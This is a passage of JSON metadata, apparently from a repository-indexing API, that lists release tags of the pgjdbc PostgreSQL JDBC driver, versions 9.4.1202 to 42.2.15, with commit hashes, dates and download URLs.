hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15/manifests"},{"name":"REL42.2.15-rc2","sha":"3802b453608349b11a81585f3dbca9f623687d3d","kind":"tag","published_at":"2020-08-07T15:16:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.15-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.15-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.15-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc2/manifests"},{"name":"REL42.2.15-rc1","sha":"6bacf8d4570e8a23e6f57cf3138a68725b4b4ad6","kind":"tag","published_at":"2020-06-19T16:39:23.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.15-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.15-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.15-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc1/manifests"},{"name":"REL42.2.14","sha":"acd0724411fc5dde7a57263c48013048e001c641","kind":"tag","published_at":"2020-06-10T16:56:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.14","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14/manifests"},{"name":"REL42.2.14-rc1","sha":"acd0724411fc5dde7a57263c48013048e001c641","kind":"tag","published_at":"2020-06-10T14:44:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.14-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.14-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.14-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14-rc1/manifests"},{"name":"REL42.2.13","sha":"e63584cfb2bbb904a971a0b19cb4857249e0b8e2","kind":"tag","published_at":"2020-06-04T14:41:33.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.13","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13/manifests"},{"name":"REL42.3.0-rc1","sha":"14b62aca4764d496813f55a43d050b017e01eb65","kind":"tag","published_at":"2020-06-01T13:06:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc1/manifests"},{"name":"REL42.2.13-rc1","sha":"ff368032bd539c8b8adac09b7a64d3788281db4d","kind":"tag","published_at":"2020-05-28T13:42:42.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.13-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.13-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.13-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13-rc1/manifests"},{"name":"v42.2.13-rc1","sha":"c6b3cd5468c93068c5b528773ca990b9f0b29a1a","kind":"tag","published_at":"2020-05-27T14:41:44.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.2.13-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.2.13-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.2.13-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.2.13-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.2.13-rc1/manifests"},{"name":"REL42.2.12","sha":"f06c15eac9d517f08bc21913fb20ee47b125d40b","kind":"tag","published_at":"2020-03-31T18:52:10.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.12","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.12/manifests"},{"name":"REL42.2.11","sha":"2083cf472be3006a01493b8fe42de54eabf9ba07","kind":"tag","published_at":"2020-03-10T15:38:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.11","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.11/manifests"},{"name":"v42.3.0-rc5","sha":"a7d6e00b8281faaf6ff07b06a60d3291763afb8c","kind":"tag","published_at":"2020-03-04T21:09:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.3.0-rc5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.3.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.3.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc5/manifests"},{"name":"v42.3.0-rc2","sha":"2c1e0ef343050cb880b896abb142b2312d6988a7","kind":"tag","published_at":"2020-03-01T18:39:19.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.3.0-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.3.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.3.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc2/manifests"},{"name":"v42.3.0-rc1","sha":"860979fd94d7e87ef33c6535b30eb2e8cd80acdd","kind":"tag","published_at":"2020-03-01T18:19:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.3.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.3.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.3.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc1/manifests"},{"name":"REL42.2.10","sha":"c81913658858c623ebc4582eb703c2d8e21212ee","kind":"tag","published_at":"2020-02-06T18:49:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.10","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.10/manifests"},{"name":"REL42.2.9","sha":"29c65312a110b1ed9811930547540ebb34188e15","kind":"tag","published_at":"2019-12-07T14:12:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.9","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.9/manifests"},{"name":"REL42.2.8","sha":"33e74f5c2239ea79a9dffb13eb1a3eb8625b3d9a","kind":"tag","published_at":"2019-09-13T17:05:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.8","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.8/manifests"},{"name":"REL42.2.7","sha":"443521738ab6ab6bcc4a4a8eaaf632899228dc4d","kind":"tag","published_at":"2019-09-10T12:39:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.7","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.7/manifests"},{"name":"REL42.2.6","sha":"cf42ba2a804d81a49e91e26c772fbed3d5eb43be","kind":"tag","published_at":"2019-06-19T19:49:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.6/manifests"},{"name":"REL42.2.5","sha":"a1a5ae4f2283d4557f36756d1a0228310a3acccb","kind":"tag","published_at":"2018-08-27T15:38:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.5/manifests"},{"name":"REL42.2.4","sha":"b3821baff00a9517f40278b5160a7495fa42a7ad","kind":"tag","published_at":"2018-07-14T13:42:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.4/manifests"},{"name":"REL42.2.3","sha":"220c02fce06980733163020634f97cf2d8483f39","kind":"tag","published_at":"2018-07-12T09:44:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.3/manifests"},{"name":"REL42.2.2","sha":"c9b1678f519243cb4b044e1bc7cab59070ac1a58","kind":"tag","published_at":"2018-03-15T16:13:57.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.2/manifests"},{"name":"REL42.2.1","sha":"7bb4ebc1c5775a0dca0adf8d760acd5336d355fc","kind":"tag","published_at":"2018-01-25T15:42:20.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.1/manifests"},{"name":"REL42.2.0","sha":"0bbd405590d898a184d5f46331cc803c5a1b22c6","kind":"tag","published_at":"2018-01-17T17:22:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.0/manifests"},{"name":"REL42.1.4","sha":"32fb99e7a8a583e057a9f59e8e5bac1571701233","kind":"tag","published_at":"2017-08-01T17:09:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.4/manifests"},{"name":"REL42.1.3","sha":"29fe74ee13300811aa05dd233d149763203ef40f","kind":"tag","published_at":"2017-07-14T08:36:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.3/manifests"},{"name":"REL42.1.2","sha":"de44a7623a05e2b4d075c84692cda2ab7a208157","kind":"tag","published_at":"2017-07-12T15:23:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.2/manifests"},{"name":"REL42.1.1","sha":"2e2ac0d294168d1896a90da470864c12af491a6b","kind":"tag","published_at":"2017-05-05T22:20:33.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.1/manifests"},{"name":"REL42.1.0","sha":"95e06e744ea3b9f4ff7de856d227d64fba32e45e","kind":"tag","published_at":"2017-05-04T21:02:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.0/manifests"},{"name":"REL42.0.0","sha":"e06a13ad8f17d04e98087039b6e346474b20e257","kind":"tag","published_at":"2017-02-18T19:26:41.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.0.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.0.0/manifests"},{"name":"REL9.4.1212","sha":"4d7a7618adb6c2b3a82a770d84747aeee4b55384","kind":"tag","published_at":"2016-11-02T17:09:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1212","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1212","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1212","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1212","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1212/manifests"},{"name":"REL9.4.1211","sha":"f808def0c90114f8912135553a77fe3d7625e9db","kind":"tag","published_at":"2016-09-18T13:55:10.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1211","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1211","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1211","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1211","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1211/manifests"},{"name":"REL9.4.1210","sha":"b29c95fa924eca19c002b8d21e2e216646c18faa","kind":"tag","published_at":"2016-09-06T20:46:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1210","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1210","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1210","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1210","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1210/manifests"},{"name":"REL9.4.1209","sha":"51684d9a898e8b6853e04d01b2f99e06e01e55dd","kind":"tag","published_at":"2016-07-15T13:00:15.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1209","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1209","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1209","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1209","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1209/manifests"},{"name":"REL9.4.1208","sha":"5b4c6fad736d71f5ed654ac4e2913b006591c8fe","kind":"tag","published_at":"2016-02-19T19:35:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1208","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1208","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1208","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1208","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1208/manifests"},{"name":"REL9.4.1207","sha":"f17e2f3074a95dc767d6d896ffd696e045b48466","kind":"tag","published_at":"2015-12-22T20:21:30.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1207","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1207","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1207","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1207","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1207/manifests"},{"name":"REL9_4_1206","sha":"e0a9b414eab3e1186e9af0450aaa9dfbf096f59e","kind":"commit","published_at":"2015-11-25T20:49:57.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1206","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1206","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1206","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1206","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1206/manifests"},{"name":"REL9_4_1205","sha":"fe777e75aa1a8098edc5de44d97895049f4f6518","kind":"commit","published_at":"2015-11-03T15:48:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1205","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1205","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1205","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1205","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1205/manifests"},{"name":"REL9_3_1104","sha":"de86e79d80ed08580fe0019d0696e9591035902c","kind":"commit","published_at":"2015-10-09T19:11:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1104","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1104","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1104","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1104","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1104/manifests"},{"name":"REL9_4_1204","sha":"a194c5e5429bb6edb0465b6fd254ea1d78237f54","kind":"commit","published_at":"2015-10-09T18:55:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1204","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1204","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1204","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1204","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1204/manifests"},{"name":"REL9_4_1203","sha":"a0bafcd8158b1938159fb49894fa403e04238267","kind":"commit","published_at":"2015-09-17T21:10:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1203","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1203","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1203","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1203","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1203/manifests"},{"name":"REL9_4_1202","sha":"8e3e868792a27625c65021f7733661614c02aaa0","kind":"commit","published_at":"2015-08-27T20:45:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1202","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1202","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1202","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1202","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1202/manifests"},{"name":"REL